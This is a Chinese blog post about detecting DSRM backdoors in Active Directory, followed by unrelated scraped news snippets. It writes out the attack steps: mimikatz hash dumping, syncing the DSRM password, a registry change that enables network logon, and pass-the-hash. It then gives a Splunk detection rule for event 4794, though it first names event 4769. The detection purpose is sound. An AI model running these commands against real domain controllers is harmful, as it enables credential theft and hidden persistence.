全球滚动:基于AD Event日志实时检测DSRM后门
01、简介每个域控制器都有一个目录还原模式(DSRM)帐户,它的密码是在安装域控时设置的,实际上它对应的就是sam文件里的本地管理员“administrator
01、简介
(相关资料图)
每个域控制器都有一个目录还原模式(DSRM)帐户,它的密码是在安装域控时设置的,实际上它对应的就是sam文件里的本地管理员“administrator”,基本很少会被重置,因此有着极强的隐蔽性。攻击者通过获取域控的DSRM密码,就可以使用帐户通过网络登录到域控服务器,从而达到权限维持的目的。
域内权限维持的方式有很多,每增加一条安全检测规则,就多一层安全保障。针对DSRM后门,基于AD Event日志能够帮助我们提供什么维度的检测,我们通过一个后门利用实例来看一下。
02、利用方式
(1)获取域内用户Hash
使用mimikatz查看域内用户test的NTLM Hash。
mimikatz # privilege::debugmimikatz # lsadump::lsa /patch /name:test
(2)将DSRM帐户和域用户的NTLM Hash同步
使用DSRM的密码和指定域用户test的密码进行同步,在命令行环境中使用ntdsutil工具重置DSRM管理员密码。
(3)抓取DSRM密码
因同步域内用户test的NTLM Hash,可以发现,DSRM Hash 和域用户test的NTLM Hash一致。
mimikatz#privilege::debugmimikatz # token::elevatemimikatz # lsadump::sam
(4)修改DSRM登录方式
DSRM 有三种登录方式,具体如下:
0:默认值,只有当域控制器重启并进入 DSRM 模式时,才可以使用 DSRM 管理员账号1:只有当本地 AD、DS 服务停止时,才可以使用 DSRM 管理员账号登录域控制器2:在任何情况下,都可以使用 DSRM 管理员账号登录域控制器
如果要使用 DSRM 账号通过网络登录域控制器,需要将该值设置为 2。
修改注册表:
reg add "HKLM\System\CurrentControlSet\Control\Lsa" /f /v DsrmAdminLogonBehavior /t REG_DWORD /d 2
(5)使用DSRM远程登录
在域成员服务器上使用DSRM进行远程登录,注意domain使用域控的主机名。
mimikatz # privilege::debugmimikatz # sekurlsa::pth /user:administrator /domain:win-dc01 /ntlm:44f077e27f6fef69e7bd834c7242b040
03、攻击检测
当攻击者尝试重置DSRM管理员密码或是指定域内用户NTLM Hash同步时,都会生成4769事件,因此可以实时监控4794事件,一旦攻击者尝试修改DSRM密码就会触发告警。
4794事件:每次更改目录还原模式(DSRM)管理员密码时,就会生成此事件,包含SID和帐户名,以及调用方工作站。
安全规则:
index=ad EventCode=4794 | stats count earliest(_time) AS start_time latest(_time) AS end_time by dest user| eval start_time=strftime(start_time,"%Y-%m-%d %H:%M:%S")| eval end_time=strftime(end_time,"%Y-%m-%d %H:%M:%S") | eval message="在"+start_time+"到"+end_time+"时间内,域控服务器:"+dest +" 疑似DSRM域后门行为,试图设置目录服务还原模式管理员密码"+count+"次,操作账号:"+user| table start_time end_time user message
安全告警效果如下图:
[ 相关文章 ]
01、简介每个域控制器都有一个目录还原模式(DSRM)帐户,它的密码是在安装域控时设置的,实际上它对应的就是sam文件里的本地管理员“administrator
春节临近,游子背起行囊,登上返乡的列车。而在列车行经的靖远黄河大桥,连日来,桥隧工们冒着严寒爬桥顶、钻桥底,全力保障铁路运行安全。腊
据生意社了解:2023年1月10日,商丘嘉盛纸业有限公司A级箱板纸价格保持平稳,各克重价格暂时无调整,最终出货价格以实际商谈为准。以下价格为
1月9日,方正证券召开2023年第一次临时股东大会,表决通过了补选3位董事和1位独立董事的议案,其中3位董事的提名股东分别来自中国平安、全国社
新强联:关于本次交易停牌前一个交易日前十大股东和前十大流通股股东持股情况的公告
今(出借人)借给(借款人)人民币整,即¥元。借款期限自200年月日起至200年月日止,共个月,利率为每月,利息共计人民币整,即¥元,全部本
以下是神州数码在北京时间1月10日10:43分盘口异动快照:1月10日,神州数码盘中涨幅达5%,截至10点43分,报23 79元,成交3 56亿元,换手率2 81%
网贷逾期一般会上征信,有些借贷机构在用户逾期后一天后就会上报给征信机构,而有些借贷机构则是会在几天后上报给征信机构,因为有些借贷机构可
网贷逾期一般会上征信,有些借贷机构在用户逾期后一天后就会上报给征信机构,而有些借贷机构则是会在几天后上报给征信机构,因为有些借贷机构可
(杨奎黄翔)历经59天跨境追逃,湖北荆门警方全链条侦破特大跨境赌博案,成功在境外抓获主要犯罪嫌疑人。警方抓获涉案嫌疑人(资料图)黄翔摄
18分钟拿三双!哈登一战迎3大里程碑恩比德缺席因祸得福激活奇兵,哈登,恩比德,76人队,哈雷尔,威少,艾弗森
很多从事主持行业的人们都想进入央视工作,因为对于这个专业来说,央视无疑是对他们能力的一种权威认可,央视也成就了不少人,比如我们今天所
维科技术(600152)01月09日在投资者关系平台上答复了投资者关心的问题。
网贷逾期一般会上征信,有些借贷机构在用户逾期后一天后就会上报给征信机构,而有些借贷机构则是会在几天后上报给征信机构,因为有些借贷机构可
锦兴国际控股(02307 HK)发布公告,于2023年1月5日,该公司的间接全资附属公司锦弘(香港)制衣有限公司(买方)、卖方DoThiHong女士及Jin
美国12月非农报告中文全文美国劳工局今日公布的报告显示,12月份非农就业人数增加了22 3万人,失业率降至3 5%。休闲和酒店、医疗保健、建筑和
今天市场高开高走,以中阳线收盘,在开门红之后,到今天已经是三连阳了,盘中最低3130点,盘中最高3159点,上证指数收于
东方电热接受机构调研时表示,公司2022年业绩预告的净利润中值在3亿元,根据财务部门的初步统计,其中新能源装备制造业务贡献约2-2 2亿元,新
2023年1月5日祥源新材连续3日融资净买入累计35 95万元
(图源:摄图网ID:501173908)Day1:南澳大桥→沿海公路→启航广场灯塔→钱澳湾灯塔→云澳渔乡风情小镇Day2:宋井风景区→三囱崖灯塔→自然之门→青
[ 相关新闻 ]
Copyright 2015-2022 每日医院网 版权所有 备案号:浙ICP备2022016517号-15 联系邮箱:5 146 761 13 @qq.com